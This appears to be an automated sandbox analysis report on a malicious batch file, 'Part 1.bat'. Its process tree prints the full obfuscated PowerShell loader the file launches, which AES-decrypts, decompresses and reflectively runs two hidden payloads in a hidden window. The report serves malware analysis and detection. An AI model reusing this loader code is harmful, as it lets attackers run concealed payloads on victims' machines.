Analysis

  • max time kernel
    120s
  • max time network
    128s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    01-07-2024 18:28

General

  • Target

    zvgfd-main/Part 1.bat

  • Size

    580KB

  • MD5

    8b844b2b29752a8a1c62efaa59dba4be

  • SHA1

    0c467148d558c4b7d6672d5b26a79af5f7fb96d4

  • SHA256

    ccb4ad561b87927edd97a02436014944c9147fe78934d2a26de73c7ee1704d0d

  • SHA512

    e086dfb88842e19c552ec00d989ae453743cabeddae93359cde6afc62354042d6ab366039e71819ad0a79319fb17ce98ec77bafb31f6183ba8a87cbb2c1df8a0

  • SSDEEP

    12288:dgOsRaPeA/fpkyocgcQwO57n+2HCZ/ySemGKDuE2wROnCFkw:dAcbBkBJwy+2HCESoZy

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 1.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1756
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uMhFm9Heyf0m35R7TqcwatHx8y7t/S5Yp9g45Hv0RJQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cYkB+WZDehKcJNABs1GBow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dLVmD=New-Object System.IO.MemoryStream(,$param_var); $PrWUn=New-Object System.IO.MemoryStream; $NtSFg=New-Object System.IO.Compression.GZipStream($dLVmD, [IO.Compression.CompressionMode]::Decompress); $NtSFg.CopyTo($PrWUn); $NtSFg.Dispose(); $dLVmD.Dispose(); $PrWUn.Dispose(); $PrWUn.ToArray();}function execute_function($param_var,$param2_var){ $TQPiU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iqsry=$TQPiU.EntryPoint; $iqsry.Invoke($null, $param2_var);}$qcgQF = 'C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 1.bat';$host.UI.RawUI.WindowTitle = $qcgQF;$XDAmi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($qcgQF).Split([Environment]::NewLine);foreach ($jksJC in $XDAmi) { if ($jksJC.StartsWith('JTCOZdwpBOYBkUChqpKD')) { $HLFxX=$jksJC.Substring(20); break; }}$payloads_var=[string[]]$HLFxX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      2⤵
        PID:1820
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2008

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2008-4-0x000007FEF587E000-0x000007FEF587F000-memory.dmp
      Filesize

      4KB

    • memory/2008-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp
      Filesize

      2.9MB

    • memory/2008-6-0x0000000002790000-0x0000000002798000-memory.dmp
      Filesize

      32KB

    • memory/2008-7-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp
      Filesize

      9.6MB

    • memory/2008-8-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp
      Filesize

      9.6MB

    • memory/2008-9-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp
      Filesize

      9.6MB

    • memory/2008-10-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp
      Filesize

      9.6MB

    • memory/2008-11-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp
      Filesize

      9.6MB

    • memory/2008-12-0x000007FEF587E000-0x000007FEF587F000-memory.dmp
      Filesize

      4KB